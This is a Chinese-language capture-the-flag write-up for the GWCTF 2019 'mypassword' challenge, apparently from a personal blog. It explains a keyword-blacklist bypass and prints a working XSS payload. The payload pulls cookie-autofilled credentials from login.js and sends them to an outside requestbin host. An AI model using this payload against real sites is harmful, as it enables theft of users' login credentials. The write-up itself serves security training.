[GWCTF 2019]mypassword
登陆界面
查看源码,看看是否有有用的东西
login.js
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split('; ');
var cookie = {};
for (var i = 0; i < cookies.length; i++) {
var arr = cookies[i].split('=');
var key = arr[0];
cookie[key] = arr[1];
}
if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
document.getElementsByName("username")[0].value = cookie['user'];
document.getElementsByName("password")[0].value = cookie['psw'];
}
}这里会从cookies中获取username和password填进当前表单
登陆后主页
首页就说了不是sql注入的题目,查看Feedback页面源码,里面有一段注释
feedback.php
if(is_array($feedback)){
echo "<script>alert('反馈不合法');</script>";
return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
while(true){
if(stripos($feedback,$val) !== false){
$feedback = str_ireplace($val,"",$feedback);
}else{
break;
}
}
}从这里可以看出是XSS的题目,如果我们想直接把cookie带出来是不可能的,因为这里cookie在黑名单中的最后一个,但是其他的还有绕过的方法。
由于这里是用foreach()对黑名单中的字符串进行一个一个遍历,但是这里是有先后循序的,如果我们构造这种方式:inpcookieut,就可以绕过过滤,只不过单个字符和最后一个黑名单(cookie)无法绕过
不过随便试试提交的内容发现,content.php响应头内有如下内容
Content-Security-Policy: default-src 'self';script-src 'unsafe-inline' 'self'允许内联脚本执行, 但是不可以远程请求js脚本执行
构造payload把账号密码发到xss平台
<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>
var uname = documcookieent.getElemcookieentsByName("username")[0].value;
var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
var res = uname + " " + passwd;
documcookieent.locacookietion="http://http.requestbin.buuoj.cn/*/?a="+res;
</scricookiept>这里是根据login.js这个文件构造的,因为他会把cookie里面的username和password的值传到username和password的表单里面,因此我们这里需要这2个input表单,等请求login.js完成之后再去获取这两个input的值传到XSS平台上。
等待一会刷新requestbin 即可得到账号密码,flag为密码
